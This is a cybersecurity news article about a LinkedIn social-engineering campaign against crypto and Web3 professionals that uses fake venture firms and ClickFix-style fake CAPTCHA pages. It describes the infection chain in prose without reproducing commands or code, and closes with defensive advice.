A sophisticated malware campaign is exploiting cryptocurrency and Web3 professionals by leveraging fake venture capital identities and deceptive video conferencing links. This operation, first identified in early 2026, employs a method known as ClickFix to trick victims into executing harmful commands on their devices, unknowingly facilitating the attack.
Social Engineering on LinkedIn
The campaign is initiated on LinkedIn, where an individual masquerading as Mykhailo Hureiev claims to be the Co-Founder and Managing Partner of a fictional investment firm, SolidBit Capital. By referencing the target’s public work within crypto or DeFi communities, the attacker builds a false sense of trust. The conversation soon shifts to arranging a call, where victims are directed via a Calendly link to a counterfeit Zoom meeting page designed to deploy malware.
According to Moonlock analysts, the infrastructure supporting this campaign was traced back to Anatolli Bigdasch, based in Boston, Massachusetts, with the email anatollibigdasch0717[at]gmail[.]com. Beyond SolidBit Capital, two additional fake firms—MegaBit and Lumax Capital—were discovered, each featuring professional-looking websites, AI-generated team photos, and fabricated company histories.
Unmasking the ClickFix Technique
The ClickFix method transforms a seemingly harmless interaction into a complete device compromise. When a victim clicks on the fake Zoom or Google Meet link, they land on a page mimicking legitimate platforms, like The Digital Asset Conference III or a typo-squatted version of the hedge fund publication, Hedgeweek. An overlay appears, masquerading as a Cloudflare CAPTCHA, tricking users into clicking it.
Once the CAPTCHA is clicked, JavaScript silently writes a harmful command to the user’s clipboard using navigator.clipboard.writeText(). The script identifies the operating system via the browser’s User-Agent string and delivers a suitable payload. On Windows, a concealed PowerShell command bypasses execution policies and runs a remote script in memory, while on macOS, a bash one-liner executes a Python script, ensuring persistence even after the terminal is closed.
Protective Measures and Future Outlook
Moonlock researchers analyzed two Mach-O binaries linked to the campaign. The first was a heavily obfuscated 9.3 MB file designed to thwart static analysis tools. The second, a 37.6 KB non-obfuscated version, maintained the same core logic. Both binaries evaded detection by all antivirus solutions on VirusTotal, highlighting the operation’s focus on stealth.
Professionals in the cryptocurrency and Web3 sectors are advised to exercise caution when receiving unsolicited LinkedIn messages proposing investments or partnerships. Verifying the registration date of company domains and examining team photos for signs of AI generation can prevent falling victim. Always scan external Zoom or Calendly links before clicking, and avoid executing commands in your terminal as part of any verification process. Urgent requests or pressure to leave LinkedIn should be treated as warning signs to disengage.
For further updates on cybersecurity threats, follow us on Google News, LinkedIn, and X. Set CSN as your preferred source on Google for real-time news.
